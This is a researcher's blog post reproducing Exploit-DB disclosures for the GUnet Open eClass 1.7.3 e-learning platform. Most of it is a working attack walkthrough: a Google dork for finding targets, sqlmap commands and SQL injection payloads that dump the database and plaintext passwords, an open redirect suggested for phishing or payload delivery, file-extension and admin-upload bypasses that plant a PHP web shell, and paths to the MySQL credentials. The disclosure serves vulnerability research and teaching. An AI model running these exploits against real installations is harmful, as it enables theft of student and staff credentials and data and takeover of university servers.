[Exploit-db.com] GUnet Open eClass E-learning platform <=1.7.3 - Multiple Vulnerabilities7 min read

These are the first vulnerabilities that I have found in open source software.
The vulnerable PHP web app is a really, really, really old version of the official E-learning platform that every Greek University is using. (v1.7.3 – 2007)
Although the vulnerabilities are fixed in later versions, none of them were ever publicly known and that is why I have successfully submitted them in the official Exploit-DB database.
The (Unauthenticated) – [View assessments of other students] Vulnerability still exists in later versions, even in the latest release if the system administrator has not properly configured the web-app in order to disable directory listing (CVE-2020-24381 – https://emaragkos.gr/cve-2020-24381/).

Version 1.7.3 is a really old piece of software so don’t expect to be amazed by the findings.
These are really common vulnerabilities that you expect to find in intentionally vulnerable applications such as DVWA.

Version 1.7.3 is vulnerable to an Unauthenticated time-based blind SQL Injection.
The vulnerable POST parameter is ‘uname’.
Older versions will probably be vulnerable too but I haven’t tested them.

https://www.exploit-db.com/exploits/48106

Be sure to check out the Vulnhub box I created as a PoC of these vulnerabilities.
https://emaragkos.gr/my-vulnhub-boxes/vulnhub-boot2root-machine-vulnuni/

# Exploit Title: GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection
# Google Dork: intext:"© GUnet 2003-2007" 	
# Date: 2019-11-03
# Exploit Author: emaragkos 
# Vendor Homepage: https://www.openeclass.org/
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
# Version: 1.7.3 (2007)
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
# CVE : -
# GUnet OpenEclass <= 1.7.3 E-learning platform - Unauthenticated Blind SQL Injection

You can confirm applications' version by visiting https://URL/info/about.php
Versions prior to 1.7.3 might also by vulnerable but were not tested.

Source code:
http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz

Setup instructions:
http://download.openeclass.org/files/docs/1.7/Install.pdf

Changelog:
https://download.openeclass.org/files/docs/1.7/CHANGES.txt

Manual:
https://download.openeclass.org/files/docs/1.7/eClass.pdf

############################################################################

Vulnerability: Post parameter (uname) is vulnerable to time-based blind SQLi 

############################################################################

Steps to reproduce:

1) Visit vulnerable webapp and confirm version is <= 1.7.3 https://URL/info/about.php

2) Configure Burp proxy to intecrept and to capture a login sequence with invalid username/password. (e.g. username:test password:test)
Your request should look like this:
POST / HTTP/1.1
Host: 192.168.1.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.8/
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Connection: close
Cookie: PHPSESSID=d6gupmerbr0k84st4d7qv9jsl1
Upgrade-Insecure-Requests: 1
uname=test&pass=test&submit=%C5%DF%F3%EF%E4%EF%F2

3) Save intercepted request as a file (Right click -> Copy to file -> Save as eclasstestlogin)

4) Load the file to SQLMap  with the use of -r parameter
sqlmap -r eclasstestlogin --level=5 --risk=3 -v
SQLMap will find the following payload
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test' AND (SELECT 5551 FROM (SELECT(SLEEP(5)))IZsi)-- aLyD&pass=test&submit=%C5%DF%F3%EF%E4%EF%F2
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---

5) Exploit it!
sqlmap -r eclasstestlogin -v --current-db
sqlmap -r eclasstestlogin -v -D [DB-NAME-GOES-HERE] --dump
sqlmap -r eclasstestlogin -v -D [DB-NAME-GOES-HERE] -T user -C password --dump

6) Bonus! Passwords are stored in plaintext

Update:
Other that the ‘uname’ SQL Injection here are a few more interesting vulnerabilities I found.

https://www.exploit-db.com/exploits/48163

# Exploit Title: GUnet OpenEclass <= 1.7.3 E-learning platform - Multiple Vulnerabilities
# Google Dork: intext:"© GUnet 2003-2007" 	
# Date: 02-03-2020
# Exploit Author: emaragkos
# Vendor Homepage: https://www.openeclass.org/
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
# Version: 1.7.3 (2007)
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
# CVE : -

Older versions are also vulnerable.

Source code:
http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz

Setup instructions:
http://download.openeclass.org/files/docs/1.7/Install.pdf

Changelog:
https://download.openeclass.org/files/docs/1.7/CHANGES.txt

Manual:
https://download.openeclass.org/files/docs/1.7/eClass.pdf

############################################################################

Unauthenticated Information Disclosure

System info
127.0.0.1/modules/admin/sysinfo 
(powered by phpSysInfo 2.0 that is also vulnerable)

Web-App version info
127.0.0.1/README.txt
127.0.0.1/info/about.php
127.0.0.1/upgrade/CHANGES.txt

############################################################################

(Unauthenticated) Open Redirect

Just by editing the link_url parameter you can redirect the user to any other external website.
The web app does not check if the link_url parameter is actually the same in the database and redirects anyway.
This can be very useful in phishing campaigns or malware distribution if the redirect URL is short and vague in order to trick the user.
e.g. The following URL redirects to google.com or it could deliver an msfvenom payload.
127.0.0.1/modules/link/link_goto.php?link_id=1&link_url=https%3A%2F%2Fcutt.ly%2F1r6rvi9

############################################################################
  
(Authenticated - Requires student account) - Error-Based SQLi

https://127.0.0.1/modules/agenda/myagenda.php?month=3&year=2020

sqlmap -u "https://127.0.0.1/modules/agenda/myagenda.php?month=2&year=2020" --batch --dump

---
Parameter: month (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: month=5' AND (SELECT 9183 FROM(SELECT COUNT(*),CONCAT(0x7170717671,(SELECT (ELT(9183=9183,1))),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Hztw&year=2020'
---
 
Almost every parameter will be either error-based, boolean-based or time-based vulnerable.
If you have a student account I recommend using this error-based SQLi because you will get all the database content really faster.
If you dont have an account use the following exploit that exploits an unauthenticated time-based blind injection.
It will definately be a slower proccess but you will get the administrator account pretty fast and move on with exploiting other authenticated vulnerabilities.
https://www.exploit-db.com/exploits/48106

############################################################################

(Authenticated - Requires student account) - PHP upload file extension bypass

If you have a student account you can bypass file extension restrictions and upload a PHP shell.
Register as user if the application is configured to allow registrations or use an SQLi to find an account that already exists.
Start looking for a class that you can submit an exercise as a student.
Register in that class and navigate to submit you exercise.
If you try to upload a .php file it will be renamed to .phps to prevent execution.
You can upload your PHP shell by spoofing the extension simply by renaming your .php file to .php3 or .PhP
Once you have uploaded it, open your course directory and then add "work" directory at the end
Course link example: https://127.0.0.1/courses/CS101/
Course link becomes: https://127.0.0.1/courses/CS101/work/
Directory listing will most likely be enabled by default and you will be able to view the directories.
Your shell will be in one of the multiple random alphanumeric directories that look like this /4a0c01h2nad9b/
Final shell link will look like this: https://127.0.0.1/courses/CS101/work/4a0c01h2nad9b/shell.php3

The same method works with "groups" if you cant find a class that supports submitting an exercise.
https://127.0.0.1/modules/group/group.php

############################################################################

(Unauthenticated) - View assessments of other students

You can view uploaded assessments from other students before or after the deadline that the professor has set.
Find the course link you are interested in.
https://127.0.0.1/courses/CS101
Add "work" directory at the end
https://127.0.0.1/courses/CS101/work/
Directory listing will most likely be enabled by default and you will be able to view and download other students' uploaded assessments.

############################################################################

(Authenticated - Requires admin account) - Upload PHP files 

You have to login to the platform as an administrator or user with admin rights.
You can grab the administrator credentials as plaintext with an Unauthenticated Blind SQL Injection using the
following exploit https://www.exploit-db.com/exploits/48106 or use the authenticated SQLi for faster results.
Once you have logged in as admin:
1) Navigate to 127.0.0.1/modules/course_info/restore_course.php
2) Upload your .php shell compressed in a .zip file
3) Ignore the error message
4) Your PHP file is now uploaded to 127.0.0.1/courses/tmpUnzipping/[your-shell-name].php 

############################################################################

(Authenticated - Requires admin account) - phpMyAdmin Remote Access 

127.0.0.1/modules/admin/mysql
phpMyAdmin 2.10.0.2 is installed by default and allows remote logins
Once you have uploaded your shell can view the config.php file that contains the mysql password
127.0.0.1/config/config.php 

############################################################################

(Authenticated - Requires admin account) - Plaintext password storage

When logged in as admin you can view all registered users credentials as plaintext.
127.0.0.1/modules/admin/listusers.php

Leave a Reply

Your email address will not be published. Required fields are marked *